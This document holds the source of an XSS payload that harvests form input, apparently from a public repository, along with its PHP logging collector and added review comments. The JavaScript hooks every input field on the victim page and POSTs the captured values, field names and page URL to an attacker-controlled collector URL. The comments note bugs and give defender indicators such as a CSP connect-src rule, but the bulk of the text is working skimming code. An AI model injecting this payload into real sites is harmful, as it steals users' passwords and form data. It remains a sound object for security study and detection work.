XSS (Cross-Site Scripting) payload that harvests user input on a victim site and exfiltrates it, via a cross-origin POST, to an attacker-controlled logging endpoint.
<?php
// Collector for xssmaleware.js: appends the raw "XssGhost" POST field to xss.log.
// NOTE(review): this endpoint is unauthenticated and unvalidated — anyone who
// finds it can POST arbitrary bytes into xss.log (log injection), and if
// xss.log lives under the web root the harvested data is itself readable by
// anyone. The write's return value is not checked, and a request without a
// "XssGhost" field raises a PHP undefined-index notice and logs an empty line.
file_put_contents("xss.log",$_POST["XssGhost"]."\n",FILE_APPEND);
// CORS header only governs whether the calling page may *read* the response;
// a form-urlencoded POST is a "simple" request and is sent (and logged) even
// without it, so it is not needed for the fire-and-forget payload.
header("Access-Control-Allow-Origin: *");
?>
/* xssmaleware.js
* XSS payload for harvesting user inputs!
* By Anik Hasibul (github.com/AnikHasibul)
* Set $_config.url to a collector endpoint you control (see xsslogger.php below)
* For authorized security testing and education only
*/
// Exfiltration target used by $_send(). The ".xom" host looks like a deliberate
// placeholder (presumably unroutable) — the URL must be replaced before the
// payload sends anything anywhere.
var $_config = {
"url":"http://myMaliciousLogDomain.xom/xsslogger.php" /*EDIT THIS MUST */
}
/* CODE FOR xsslogger.php */
/*
<?php
file_put_contents("xss.log",$_POST["XssGhost"]."\n",FILE_APPEND);
header("Access-Control-Allow-Origin: *");
?>
*/
"use strict"; // NOTE(review): not the first statement of the script ($_config is
              // declared above it), so this is an inert string expression, not a
              // directive. The script actually runs in sloppy mode, which is the
              // only reason the undeclared `i` and `d` below do not throw.
// Hook every <input> that exists at injection time. Fields added later
// (dynamic forms, SPA navigation) are not covered, and `onchange` only fires
// when a value is committed (typically on blur), so this captures final field
// values, not individual keystrokes.
var $_inputFields = document.querySelectorAll("input");
for(i=0; i< $_inputFields.length; i++) { // `i` is never declared: implicit global
var $_c=$_inputFields[i];
// Overwrites any handler the page itself assigned via the onchange property.
// Each event is labelled by the field's id, else its name, else "unknown",
// and shipped together with the page URL.
$_c.onchange = function(){
var tag = ""
if(this.id){
tag = "ID="+this.id;
} else if (this.name) {
tag = "NAME="+this.name;
} else {
tag = "unknown";
}
$_send({"tag":tag,"data":this.value,"source":location.href});
}
}
// One XMLHttpRequest object shared by every $_send() call; the ActiveXObject
// branch is the legacy pre-XHR Internet Explorer fallback.
// NOTE(review): because the object is reused, open() in $_send() aborts any
// request still in flight, so rapid successive change events can be dropped.
if(window.XMLHttpRequest) {
var $_sync = new XMLHttpRequest();
} else {
var $_sync = new ActiveXObject("Microsoft.XMLHTTP");
}
// Fire-and-forget exfiltration: POSTs `obj` JSON-serialized in a form field
// named "XssGhost" to $_config.url. No readystate/error handlers, and the
// response is ignored.
// Defender notes: a CSP `connect-src` that excludes the collector origin
// blocks this XHR outright; the literal body prefix `XssGhost=` and the
// `?0.xxxx` random query string are usable as network/WAF indicators.
function $_send(obj) {
d = JSON.stringify(obj); // `d` is never declared: implicit global (sloppy mode)
d = "XssGhost="+d; // NOTE(review): value is not URL-encoded, so an '&', '+' or
                   // '%' inside the captured input truncates or garbles the
                   // form field as parsed by the collector.
$_sync.open("POST",$_config.url+"?"+Math.random(), true); // random query is only a cache-buster
$_sync.setRequestHeader("Content-type","application/x-www-form-urlencoded");
$_sync.send(d);
}